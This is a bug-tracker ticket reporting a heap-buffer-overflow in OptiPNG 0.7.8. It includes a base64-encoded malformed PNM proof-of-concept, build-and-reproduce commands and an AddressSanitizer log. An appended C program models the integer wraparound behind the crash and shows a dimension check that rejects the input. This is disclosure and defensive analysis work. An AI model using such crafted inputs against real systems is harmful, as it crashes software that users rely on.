
#89 Heap-buffer-overflow at pnm_fget_values

Milestone: v1.0 (example)
Status: open
Owner: None
Priority: 5
Updated: 2024-01-12
Created: 2024-01-12
Creator: Yun
Private: No


Description

It looks like a memory bug in OptiPNG.

Version

OptiPNG version 0.7.8

Reproduction Steps

Environment

  • Ubuntu 20.04 LTS
  • clang version 10.0.0-4ubuntu1

PoC

echo UDYKNjI2NjY2NjY2NgoyCjMBADY2NjY2NjY2NgAAACAAAAAgCAMAAABEpIrGNjY2NjY2NjY2IzY2NjY2NjY2NjY2/zj2yQ== | base64 -d > poc1.png

Or please refer to the attachment

Build and reproduce

CC=clang CFLAGS=-fsanitize=address LDFLAGS='-fsanitize=address' ./configure -enable-debug

make -j4

echo UDYKNjI2NjY2NjY2NgoyCjMBADY2NjY2NjY2NgAAACAAAAAgCAMAAABEpIrGNjY2NjY2NjY2IzY2NjY2NjY2NjY2/zj2yQ== | base64 -d > poc1.png

./src/optipng/optipng  poc1.png

ASAN logs

./src/optipng/optipng  poc1.png
** Processing: poc1.png
=================================================================
==52427==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f08626d37f8 at pc 0x0000004942ff bp 0x7ffcf5111920 sp 0x7ffcf51110e8
WRITE of size 23660392228 at 0x7f08626d37f8 thread T0
    #0 0x4942fe in __asan_memset (/mydata/data/code/temp/optipng-0.7.8/src/optipng/optipng+0x4942fe)
    #1 0x56bac3 in pnm_fget_values /mydata/data/code/temp/optipng-0.7.8/src/pnmio/pnmin.c:290:9
    #2 0x4e9dfd in pngx_read_pnm /mydata/data/code/temp/optipng-0.7.8/src/pngxtern/pngxrpnm.c:174:14
    #3 0x4e31da in pngx_read_image /mydata/data/code/temp/optipng-0.7.8/src/pngxtern/pngxread.c:130:13
    #4 0x4cbc63 in opng_read_file /mydata/data/code/temp/optipng-0.7.8/src/optipng/optim.c:983:19
    #5 0x4c9894 in opng_optimize_impl /mydata/data/code/temp/optipng-0.7.8/src/optipng/optim.c:1566:9
    #6 0x4c8f8e in opng_optimize /mydata/data/code/temp/optipng-0.7.8/src/optipng/optim.c:1934:9
    #7 0x4c6496 in process_files /mydata/data/code/temp/optipng-0.7.8/src/optipng/optipng.c:927:13
    #8 0x4c4328 in main /mydata/data/code/temp/optipng-0.7.8/src/optipng/optipng.c:961:18
    #9 0x7f0b26ec8082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16
    #10 0x41c45d in _start (/mydata/data/code/temp/optipng-0.7.8/src/optipng/optipng+0x41c45d)

0x7f08626d37f8 is located 0 bytes to the right of 6480523256-byte region [0x7f06e0284800,0x7f08626d37f8)
allocated by thread T0 here:
    #0 0x494b9d in malloc (/mydata/data/code/temp/optipng-0.7.8/src/optipng/optipng+0x494b9d)
    #1 0x4f493e in png_malloc_base /mydata/data/code/temp/optipng-0.7.8/third_party/libpng/pngmem.c:95:17
    #2 0x4f48bb in png_malloc /mydata/data/code/temp/optipng-0.7.8/third_party/libpng/pngmem.c:179:10
    #3 0x4e9d99 in pngx_read_pnm /mydata/data/code/temp/optipng-0.7.8/src/pngxtern/pngxrpnm.c:165:10
    #4 0x4e31da in pngx_read_image /mydata/data/code/temp/optipng-0.7.8/src/pngxtern/pngxread.c:130:13
    #5 0x4cbc63 in opng_read_file /mydata/data/code/temp/optipng-0.7.8/src/optipng/optim.c:983:19
    #6 0x4c9894 in opng_optimize_impl /mydata/data/code/temp/optipng-0.7.8/src/optipng/optim.c:1566:9
    #7 0x4c8f8e in opng_optimize /mydata/data/code/temp/optipng-0.7.8/src/optipng/optim.c:1934:9
    #8 0x4c6496 in process_files /mydata/data/code/temp/optipng-0.7.8/src/optipng/optipng.c:927:13
    #9 0x4c4328 in main /mydata/data/code/temp/optipng-0.7.8/src/optipng/optipng.c:961:18
    #10 0x7f0b26ec8082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow (/mydata/data/code/temp/optipng-0.7.8/src/optipng/optipng+0x4942fe) in __asan_memset
Shadow bytes around the buggy address:
  0x0fe18c4d26a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe18c4d26b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe18c4d26c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe18c4d26d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe18c4d26e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fe18c4d26f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[fa]
  0x0fe18c4d2700: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe18c4d2710: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe18c4d2720: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe18c4d2730: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe18c4d2740: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==52427==ABORTING
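Added analysis and example (not part of the ticket and not OptiPNG's code): the sizes in the report are consistent with the samples-per-row count being computed in 32-bit unsigned arithmetic when the row buffer is allocated and in full-width arithmetic when pnm_fget_values zero-fills the unread remainder of the row. The PoC header declares a width of 6266666666, which truncates to 1971699370 as a 32-bit unsigned; 1971699370 * 3 samples wraps to 1620130814, and 1620130814 * sizeof(unsigned int) is exactly the 6480523256-byte allocation in the log, while the same product without wrapping is 23660392440 bytes, 212 bytes (53 already-consumed samples) above the 23660392228-byte memset. The C program below decodes the PoC inline, parses its PNM header, reproduces that arithmetic and shows a dimension check that rejects such an input before any buffer arithmetic. The arithmetic model, the function names and the 2^31-1 limit (PNG's own maximum dimension) are assumptions of the example, not taken from the OptiPNG source; the parser is a generic one written for this example.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed input: the base64 PoC from this ticket (poc1.png). */
static const char POC_B64[] =
    "UDYKNjI2NjY2NjY2NgoyCjMBADY2NjY2NjY2NgAAACAAAAAgCAMAAABEpIrG"
    "NjY2NjY2NjY2IzY2NjY2NjY2NjY2/zj2yQ==";

struct pnm_header {
    int type;                 /* 2, 3, 5 or 6: the PNM formats that carry a maxval */
    uint64_t width, height, maxval;
    size_t data_offset;       /* offset of the first sample byte */
};

static int b64val(int c)
{
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    return c == '+' ? 62 : c == '/' ? 63 : -1;
}

/* Minimal base64 decoder; returns the number of bytes produced. */
static size_t b64decode(const char *in, unsigned char *out, size_t cap)
{
    uint32_t acc = 0; int bits = 0; size_t n = 0;
    for (; *in && *in != '='; in++) {
        int v = b64val((unsigned char)*in);
        if (v < 0) continue;                        /* skip line breaks etc. */
        acc = (acc << 6) | (uint32_t)v; bits += 6;
        if (bits >= 8) {
            bits -= 8;
            if (n < cap) out[n] = (unsigned char)(acc >> bits);
            n++;
            acc &= (1u << bits) - 1;
        }
    }
    return n;
}

/* Generic PGM/PPM header parser: magic, three decimal fields with optional
   '#' comments, then one separator byte. Width is kept in 64 bits so the
   declared value is reported intact instead of silently wrapping. */
static int parse_pnm_header(const unsigned char *buf, size_t len, struct pnm_header *h)
{
    uint64_t f[3]; size_t pos = 2;
    if (len < 2 || buf[0] != 'P') return 0;
    if (buf[1] != '2' && buf[1] != '3' && buf[1] != '5' && buf[1] != '6') return 0;
    h->type = buf[1] - '0';
    for (int i = 0; i < 3; i++) {
        for (;;) {                                  /* skip whitespace and comments */
            while (pos < len && isspace(buf[pos])) pos++;
            if (pos < len && buf[pos] == '#') { while (pos < len && buf[pos] != '\n') pos++; continue; }
            break;
        }
        if (pos >= len || !isdigit(buf[pos])) return 0;
        uint64_t v = 0;
        for (; pos < len && isdigit(buf[pos]); pos++) {
            unsigned d = buf[pos] - '0';
            if (v > (UINT64_MAX - d) / 10) return 0;  /* does not even fit 64 bits */
            v = v * 10 + d;
        }
        f[i] = v;
    }
    if (pos >= len) return 0;
    h->width = f[0]; h->height = f[1]; h->maxval = f[2];
    h->data_offset = pos + 1;   /* PNM: one whitespace byte; the PoC has 0x01 here */
    return 1;
}

static unsigned pnm_channels(int type) { return (type == 3 || type == 6) ? 3 : 1; }

/* Model of the arithmetic implied by the ASan sizes (an assumption of this example):
   width held as 32-bit unsigned; the allocation multiplies it by the channel count
   in 32 bits (wrapping), the zero-fill of the row does the product in 64 bits. */
static uint32_t width_as_uint32(uint64_t w) { return (uint32_t)w; }

static uint64_t modelled_alloc_bytes(uint32_t w, unsigned ch)
{
    uint32_t samples = w * ch;                      /* wraps modulo 2^32 */
    return (uint64_t)samples * sizeof(unsigned int);
}

static uint64_t modelled_fill_bytes(uint32_t w, unsigned ch)
{
    return (uint64_t)w * ch * sizeof(unsigned int);
}

/* Hardened check to run before any buffer arithmetic: PNG cannot hold a dimension
   above 2^31-1, and the row buffer must fit in size_t without wrapping. */
static int dims_ok(uint64_t w, uint64_t h, unsigned ch)
{
    const uint64_t png_max = 0x7fffffffULL;
    if (w == 0 || h == 0 || w > png_max || h > png_max) return 0;
    if (w > SIZE_MAX / ch / sizeof(unsigned int)) return 0;
    return 1;
}

/* Decode the ticket's PoC and parse its header. */
static int parse_poc(struct pnm_header *h)
{
    unsigned char buf[256];
    size_t n = b64decode(POC_B64, buf, sizeof buf);
    return parse_pnm_header(buf, n, h);
}

int main(void)
{
    struct pnm_header h;
    if (!parse_poc(&h)) { fprintf(stderr, "header rejected\n"); return 1; }
    unsigned ch = pnm_channels(h.type);
    uint32_t w32 = width_as_uint32(h.width);
    printf("P%d width=%llu height=%llu maxval=%llu data at +%zu\n", h.type,
           (unsigned long long)h.width, (unsigned long long)h.height,
           (unsigned long long)h.maxval, h.data_offset);
    printf("width as uint32: %u\n", w32);
    printf("modelled allocation: %llu bytes, modelled zero-fill: %llu bytes\n",
           (unsigned long long)modelled_alloc_bytes(w32, ch),
           (unsigned long long)modelled_fill_bytes(w32, ch));
    printf("dims_ok: %d\n", dims_ok(h.width, h.height, ch));
    return 0;
}
```

Compile with `cc -std=c99 -o pocinfo pocinfo.c` and run it: the header reports width 6266666666, height 2 and maxval 3, the modelled allocation matches the 6480523256-byte region in the ASan log, the modelled fill exceeds it several times over, and dims_ok rejects the dimensions. The same check applied to the PNG fragment's own 32x32 header passes, which is the behaviour a reader expects from a fix.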
Attachments: 1
